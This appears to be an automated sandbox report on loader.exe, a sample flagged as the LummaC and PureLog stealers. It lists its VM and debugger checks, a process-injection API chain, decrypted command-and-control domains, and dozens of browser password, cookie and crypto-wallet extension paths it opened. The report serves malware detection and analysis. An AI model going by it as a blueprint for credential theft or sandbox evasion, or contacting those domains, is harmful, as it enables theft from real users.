Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\loader.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\loader.exe	Memory allocated: BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Memory allocated: 2A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Memory allocated: F40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\loader.exe

Window / User API: threadDelayed 6972

Jump to behavior

Source: C:\Users\user\Desktop\loader.exe TID: 7412	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\loader.exe TID: 7744	Thread sleep count: 6972 > 30			Jump to behavior

Source: C:\Users\user\Desktop\loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\loader.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\loader.exe	Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: loader.exe, 00000002.00000002.2934394822.000000000166B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: loader.exe, 00000002.00000002.2934279348.000000000162C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWUg
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: loader.exe, 00000002.00000002.2934394822.000000000166B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW=
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\loader.exe

API call chain: ExitProcess graph end node

graph_2-14832

Source: C:\Users\user\Desktop\loader.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\loader.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\loader.exe

Code function: 2_2_00441AA0 LdrInitializeThunk,

2_2_00441AA0

Source: C:\Users\user\Desktop\loader.exe	Code function: 0_2_02A18621 mov edi, dword ptr fs:[00000030h]		0_2_02A18621
Source: C:\Users\user\Desktop\loader.exe	Code function: 0_2_02A1879E mov edi, dword ptr fs:[00000030h]		0_2_02A1879E

Source: C:\Users\user\Desktop\loader.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\loader.exe

Code function: 0_2_02A18621 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02A18621

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\loader.exe

Memory written: C:\Users\user\Desktop\loader.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: loader.exe, 00000000.00000002.1818004819.0000000004271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: undesirabkel.click

Source: C:\Users\user\Desktop\loader.exe

Process created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"

Jump to behavior

Source: C:\Users\user\Desktop\loader.exe	Queries volume information: C:\Users\user\Desktop\loader.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\loader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: loader.exe, 00000002.00000002.2934454000.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000002.00000002.2934279348.000000000162C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: loader.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: loader.exe, type: SAMPLE
Source: Yara match	File source: 0.0.loader.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loader.exe.3a19550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loader.exe.3a19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1818004819.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1694866108.0000000000552000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
